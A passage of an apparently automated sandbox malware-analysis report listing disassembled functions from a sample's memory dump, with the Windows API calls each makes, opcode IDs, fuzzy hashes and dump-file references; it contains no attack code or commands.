                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                              • Opcode ID: f9c98287bc8f8feb0460261bef8251c3ad89a7ca00a3a72dffcffce09c2f2b67
                                                                                                                                                                                                              • Instruction ID: 3a5b0304ba1eaf31a36cba2e670bed725f88328057eeb505b1fc126efe8c8a89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9c98287bc8f8feb0460261bef8251c3ad89a7ca00a3a72dffcffce09c2f2b67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C118761A186C2C1EB60AB35E5403F9A664FB44774FA84331EA3D922D5CF3CD556C750
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB913C0 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Item$RectText$ClientWindowswprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 402765569-0
                                                                                                                                                                                                              • Opcode ID: 81bc7c9ad6575843b3a2adb7e7eada1b1bca9b04a44248fe7cc91ed728909399
                                                                                                                                                                                                              • Instruction ID: 6e0ccc69077333361c012ebbda848921e7545095b2b76a7fed22800852eae2de
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81bc7c9ad6575843b3a2adb7e7eada1b1bca9b04a44248fe7cc91ed728909399
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B018820F0D2CA81FF49A762B2643F9D7A0AF49B80F8C4035C80D463D68E6CE1459B21
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB99310 Relevance: 3.0, APIs: 2, Instructions: 36timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2838179519-0
                                                                                                                                                                                                              • Opcode ID: 82aff9353917199812c6260b96f694920c627220131da2baf5cc5a51b94c4fe2
                                                                                                                                                                                                              • Instruction ID: b07a4d382fe2b17e9e8002f838b194093f5d464757de122feaa513b22419020e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82aff9353917199812c6260b96f694920c627220131da2baf5cc5a51b94c4fe2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 140152329186C5C5EB12AF30D4553EEABA0E765B0DF4C0075CB8D0E296CE2ED149C731
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9B6D0 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00007FF75FB9B4C4,?,?,00007FF75FB97C79), ref: 00007FF75FB9B6ED
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00007FF75FB9B4C4,?,?,00007FF75FB97C79), ref: 00007FF75FB9B71A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: fb1b40424746d7a0d454d32c00dcc2a09f05ccf97f409d19b028fb7a867486e8
                                                                                                                                                                                                              • Instruction ID: 9cd5598adbd95560d488900c67af7eed094ef19fc7d3e1ffb75c27e65155b172
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb1b40424746d7a0d454d32c00dcc2a09f05ccf97f409d19b028fb7a867486e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31F01826B087D392E750AB31E4042EAA365BB54BC0F988171ED9C87759DE3CD9458750
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9B34C Relevance: 3.0, APIs: 2, Instructions: 26fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeleteFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4033686569-0
                                                                                                                                                                                                              • Opcode ID: 2b03dbdb66dff3f60291192f9a790cf6b38a4c62befaa2b4bf38ed09df3bbe89
                                                                                                                                                                                                              • Instruction ID: 9e620bf9cf828365d5a7322b5e63ad926a6c45d56ec09b633d7caa8a836faf54
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b03dbdb66dff3f60291192f9a790cf6b38a4c62befaa2b4bf38ed09df3bbe89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75F03712B1C6C3C1E660AB31E9043EE9364BF557C4FCC8135E98D4369ADE2CD5558624
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9B3C0 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00007FF75FB9B488,00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B3D6
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00007FF75FB9B488,00000001,00007FF75FB9B2C1,0000111D,?,?,00007FF75FB97C79), ref: 00007FF75FB9B3FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              • Opcode ID: 1a59d28757cbfac9e8b7703ca95a00cc392ef30b398a30a6bab5ade148643187
                                                                                                                                                                                                              • Instruction ID: 7bef005c6a53058c16ef3a7e57bd3a7cf0d4b5157270259712aad5c6c76dd54d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a59d28757cbfac9e8b7703ca95a00cc392ef30b398a30a6bab5ade148643187
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98F0A721B086C282E6607B34E5443F99261BB497D4F884130E99C837EACE7CD9888610
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB25B0 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$LoadString$DialogDispatchItemPeekTextTranslateswprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 601060688-0
                                                                                                                                                                                                              • Opcode ID: 82aa128e8539a57056cc77cfd8a92f720249eb72442b728fe3c7635f96eb94eb
                                                                                                                                                                                                              • Instruction ID: 2aad8e410fda1fe303f5751a736409c1374e529f254d8eb87a59db16d0f47119
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82aa128e8539a57056cc77cfd8a92f720249eb72442b728fe3c7635f96eb94eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5E03955E096C6C6FA1073B0ED013F996D4AF89385FCC0139FA4D57792CD2CD6568622
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA2D84 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF75FBA2DD9,?,?,?,?,?,?,?,?,00007FF75FB9C544), ref: 00007FF75FBA2D88
                                                                                                                                                                                                              • GetProcessAffinityMask.KERNEL32 ref: 00007FF75FBA2D9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                                                                                              • Opcode ID: 36c52fee964b1d07e923aecdfe421dd5a67ccda00a6ef38af63a4af350f5d3be
                                                                                                                                                                                                              • Instruction ID: de21a98f0acbc8b1f6ae89d4420cafd0f8f65f01345bd7336c449149501cf043
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36c52fee964b1d07e923aecdfe421dd5a67ccda00a6ef38af63a4af350f5d3be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8E02B61F145C2C2DF099F75C4504EAB391FFC8B40FC88036D54A83614DE3CE1898720
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA2320 Relevance: 3.0, APIs: 2, Instructions: 22libraryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                                                                                              • Opcode ID: cb728cfa56246d41a190ca8f87e85a0570454b63df53ba17ed7b812c77b783f2
                                                                                                                                                                                                              • Instruction ID: 35558bef3aebd1866e7628e62aecf101d3f286ff1349f73a369b777946213443
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb728cfa56246d41a190ca8f87e85a0570454b63df53ba17ed7b812c77b783f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46E0E561B185C2D7FA60BB31E8543EBD2A4BF98784FC84171E5CD82695DE2CD648C760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBDA18 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 588628887-0
                                                                                                                                                                                                              • Opcode ID: 124b22454ced5a70d0b54dc7a6e7da9e1185ed39ab18a569fda50e86802df24b
                                                                                                                                                                                                              • Instruction ID: 4952b75ca07efe62693871c8a46fe89b571b6fb43c7f37be6ef0aca87a875573
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 124b22454ced5a70d0b54dc7a6e7da9e1185ed39ab18a569fda50e86802df24b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AE0EC50E1E5C3C7FF18BBB2A8551FAE2D15F9CB55F8C5034CA0D46295EE2CAC868634
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB5EBC Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc__vcrt___vcrt_uninitialize_ptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3765095794-0
                                                                                                                                                                                                              • Opcode ID: ce76eb26b14415838449865cd5ede78bf3b980bdfab7b25fa4d7bbb502b8a526
                                                                                                                                                                                                              • Instruction ID: 372f3625d92b9b47d2a1cd8ee3e58e5b3fdf8348c27628bfeba78f201c746b53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce76eb26b14415838449865cd5ede78bf3b980bdfab7b25fa4d7bbb502b8a526
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5E01A70E0D7C2C6FA50BB349C450F9A2506F05314FDC1631D02D861E6DE6CEA4BC63A
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB1F74 Relevance: 2.5, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcscpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1284135714-0
                                                                                                                                                                                                              • Opcode ID: a98feb0b073193213299ad8b9b344e993bb45c44c80e5b9f4e929e910bc24ad5
                                                                                                                                                                                                              • Instruction ID: 2181e0a92435ce97a21c800ba2a83a3acc0e4d26f4669a6caea80e85b2ace276
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a98feb0b073193213299ad8b9b344e993bb45c44c80e5b9f4e929e910bc24ad5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9113A65E091C3D9EA00BB34E8513F5B7A0AF59340FCC4039E64C862A6EE6CE549C730
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBC744 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
